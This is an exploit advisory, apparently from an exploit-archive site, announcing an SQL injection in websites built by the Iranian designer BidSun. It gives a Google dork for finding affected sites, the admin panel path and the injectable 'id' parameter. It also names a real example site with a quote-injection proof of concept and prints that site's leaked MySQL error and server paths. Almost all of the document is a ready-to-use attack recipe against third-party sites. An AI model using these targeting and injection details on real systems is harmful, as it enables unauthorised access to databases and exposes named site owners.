#################################################################################################
# Exploit Title : BidSun.ir Web Design طراحی و پیاده سازی توسط: بیدسان SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 28/09/2018
# Vendor Homepage : bidsun.ir
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''طراحی و پیاده سازی توسط: بیدسان''
# Admin Panel Login Path : /index.php?mod=auth
# Exploit :
/index.php?mod=content&met=showcat&id=[SQL Injection]
#################################################################################################
# Example Site => anv.ir/index.php?mod=content&met=showcat&id=548%27 => [ Proof of Concept ] => archive.is/IDtT7
# SQL Database Error =>
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]:
Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '\')
LIMIT 0,200' at line 1' in /home/kadoos/domains/kadoos-ac.ir/public_html/core/lib/bidsun/bidsun_pdo/BidsunPdo.php:14
Stack trace: #0 /home/kadoos/domains/kadoos-ac.ir/public_html/core/lib/bidsun/bidsun_pdo/BidsunPdo.php(14):
PDO->query('SELECT id FROM ...') #1 /home/kadoos/domains/kadoos-ac.ir/public_html/core/core.php(1575):
BidsunPdo->Execute('SELECT id FROM ...') #2 /home/kadoos/domains/kadoos-ac.ir/
public_html/modules/content/index.php(310): pagination2('content', 30, 'SELECT id FROM ...') #3
[internal function]: showcat() #4 /home/kadoos/domains/kadoos-ac.ir/public_html/core/router.php(213):
call_user_func('showcat') #5 /home/kadoos/domains/kadoos-ac.ir/public_html/index.php(34):
require_once('/home/kadoos/do...') #6 {main} thrown in /home/kadoos/
domains/kadoos-ac.ir/public_html/core/lib/bidsun/bidsun_pdo/BidsunPdo.php on line 14
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################